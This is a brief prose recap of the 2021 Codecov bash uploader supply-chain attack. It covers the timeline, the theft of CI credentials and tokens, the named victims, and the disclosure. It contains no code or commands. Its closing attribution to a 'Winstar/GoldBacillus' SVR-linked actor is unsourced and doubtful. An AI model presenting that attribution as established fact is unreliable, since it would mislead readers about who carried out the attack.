Between 31 January and 1 April 2021, attackers modified Codecov’s popular bash uploader script — used by thousands of CI/CD pipelines to upload code coverage reports — to exfiltrate environment variables including credentials, tokens, and API keys from every CI/CD pipeline that used it. The tampered script sent stolen data to an attacker-controlled server (opcode.io). Codecov discovered the compromise on 1 April 2021 and disclosed it on 15 April. The downstream impact was significant: Twilio confirmed their CI/CD environment was compromised; Atlassian confirmed exposure of credentials; HashiCorp’s Mercurial mirror deployment key was exposed; Snyk, The Washington Post, Shopify, and many others investigated impacts. Atlassian, Twilio, Hashicorp, Confluent, and Procore were among major confirmed victims. The FBI assisted Codecov in the investigation. The attack was notable because it silently ran in CI pipelines for over two months, affecting both open-source projects and private enterprise pipelines. The attacker used the stolen credentials to further breach downstream companies. The technique — compromising a widely-used CI tool to harvest secrets at scale — predated and inspired several subsequent supply chain attacks. The attack was attributed to a Winstar/GoldBacillus threat actor affiliated with Russian SVR (based on similar TTPs to APT29/Cozy Bear).